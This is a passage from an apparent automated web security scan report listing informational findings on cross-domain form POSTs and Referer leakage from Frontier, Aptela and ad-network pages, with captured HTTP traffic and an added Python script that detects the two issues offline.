<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...
<!-- Begin Footer -->
<form name="Form1" method="post" action="http://www.frontieronline.com/Default.aspx" id="Form1">
<table width="955" border="0" cellspacing="0" cellpadding="0" >
...[SNIP]...

14.2. http://www.aptela.com/lp2011/T2V1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page contains a form which POSTs data to the domain ww3.vocalocity.com. The form contains the following fields:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<form class="lpeRegForm formNotEmpty" method="post" enctype="application/x-www-form-urlencoded" action="http://ww3.vocalocity.com/l/7772/2011-08-18/642J" id="mktForm_1025" name="mktForm_1025">

<ul>
...[SNIP]...

14.3. http://www.aptela.com/lp2011/T2V1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page contains a form which POSTs data to the domain ww3.vocalocity.com. The form contains the following fields:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>
<form class="lpeRegForm formNotEmpty" method="post" enctype="application/x-www-form-urlencoded" action="http://ww3.vocalocity.com/l/7772/2011-08-18/642J" id="mktForm_1026" name="mktForm_1026">
   
   <ul class="emailForm">
...[SNIP]...

14.4. http://www.frontierhelp.com/frontiernetnews.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /frontiernetnews.cfm

Issue detail

The page contains a form which POSTs data to the domain www.frontieronline.com. The form contains the following fields:

Request

GET /frontiernetnews.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155; s_cc=true; s_sq=cznpeace%3D%2526pid%253DFrontier%252520Peace%252520of%252520Mind%252520%25253A%252520Tech%252520Support%2526pidt%253D1%2526oid%253Dhttp%25253A//www.frontierhelp.com/frontiernetnews.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
</style>

<form name="Form1" method="post" action="http://www.frontieronline.com/Default.aspx" id="Form1">

<table width="955" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...

14.5. http://www.frontierhelp.com/techsupport.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /techsupport.cfm

Issue detail

The page contains a form which POSTs data to the domain www.frontier.com. The form contains the following fields:

Request

GET /techsupport.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:46:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
<tr>
                   <form name="Form1" method="post" action="http://www.frontier.com/Default.aspx" id="Form1">
                   <td>
...[SNIP]...

15. Cross-domain Referer leakage
There are 129 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, that information is transmitted to the other domain. If the other domain is not fully trusted by the application, this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
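The two checks whose background is given in sections 14 and 15 (a form that POSTs to a host other than the page's own, and a page loaded from a URL with a query string that links to third-party hosts, which would then receive that URL in the Referer header) as an added Python example. This is not the scanner's or the report's own code; the sample HTML is constructed, modelled on the evidence in 14.1 and 15.1, and the function names cross_domain_posts and referer_leakage are my own.

```python
# Added example (not part of the XSS.Cx/Burp report): offline re-implementation
# of the cross-domain POST and Referer-leakage checks, run over constructed
# HTML that mirrors the report's evidence. All names here are my own.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _TargetCollector(HTMLParser):
    """Collect form targets and outbound link/resource URLs from a page."""

    def __init__(self):
        super().__init__()
        self.forms = []   # (method, action) for every <form>
        self.links = []   # href/src of anchors, images, scripts, iframes

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("method", "get").lower(), a.get("action", "")))
        elif tag in ("a", "area", "link") and a.get("href"):
            self.links.append(a["href"])
        elif tag in ("img", "script", "iframe") and a.get("src"):
            self.links.append(a["src"])


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _collect(html):
    c = _TargetCollector()
    c.feed(html)
    return c


def cross_domain_posts(page_url, html):
    """Issue 14: absolute action URLs of POST forms whose host differs from the page's."""
    page_host = _host(page_url)
    found = []
    for method, action in _collect(html).forms:
        target = urljoin(page_url, action)   # relative actions resolve to the page's own host
        if method == "post" and _host(target) and _host(target) != page_host:
            found.append(target)
    return found


def referer_leakage(page_url, html):
    """Issue 15: third-party hosts that would receive page_url, query string
    included, in the Referer header when the browser loads or follows them.
    Returns [] when the page URL carries no query string to leak."""
    if not urlparse(page_url).query:
        return []
    page_host = _host(page_url)
    hosts = {_host(urljoin(page_url, u)) for u in _collect(html).links}
    return sorted(h for h in hosts if h and h != page_host)


# Constructed sample 1: modelled on the login.frontier.com footer form (14.1).
# The same-origin POST and the cross-domain GET form are there to show what is NOT reported.
FRONTIER_URL = "https://login.frontier.com/webmail/"
FRONTIER_HTML = """
<form name="Login" method="post" action="/webmail/login">...</form>
<form name="Search" method="get" action="http://search.example.net/q">...</form>
<form name="Form1" method="post" action="http://www.frontieronline.com/Default.aspx" id="Form1">...</form>
"""

# Constructed sample 2: modelled on the ad.agkn.com iframe page (15.1), whose
# URL carries a query string and whose body links to other domains.
AGKN_URL = "http://ad.agkn.com/iframe!t=1129!?che=352364418348669671&e=x"
AGKN_HTML = """
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671" rel="nofollow external">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_300x250.jpg" alt="">
</a>
<a href="/interaction!che=191113646">same host, not reported</a>
"""

if __name__ == "__main__":
    print("cross-domain POST targets:", cross_domain_posts(FRONTIER_URL, FRONTIER_HTML))
    print("Referer would leak to:", referer_leakage(AGKN_URL, AGKN_HTML))
```

Run it directly to print both results. The collector only looks at four tag types; a real page also leaks the Referer through stylesheets, fonts and script-initiated requests, so a full implementation would gather more. Neither check can tell whether the query string actually holds anything sensitive (a session token versus an ad-impression id); that is the manual review the background paragraphs ask for.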


15.1. http://ad.agkn.com/iframe!t=1129!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<body style="border: 0; margin: 0; padding: 0;">


<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=191113646?imid=4868126810786847819&ipid=804&crid=170&a=CLICK&status=0&l=http://www.aggregateknowledge.com" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_300x250.jpg" alt="" border="0">
</a>
...[SNIP]...

15.2. http://ad.agkn.com/iframe!t=1131!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<body style="border: 0; margin: 0; padding: 0;">


<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=610554187?imid=6007661064900069334&ipid=805&crid=176&a=CLICK&status=0&l=http://www.aggregateknowledge.com" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_728x90.jpg" alt="" border="0">
</a>
...[SNIP]...

15.3. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/f/21e/%2a/y%3B243197673%3B1-0%3B0%3B65511749%3B4307-300/250%3B43561982/43579769/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fi.mitsubishiCars.com/%3Fcid%3DAD_062311_iB_100365"><img src="http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.4. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:41 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=http%3a%2f%2fwww.comcast.com/Movers/Move.cspx%3Fdfaid%3D2199899%26cmp%3D0"><img src="http://s0.2mdn.net/2199899/Q211_CORP_AW_MOV_XF-TP_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
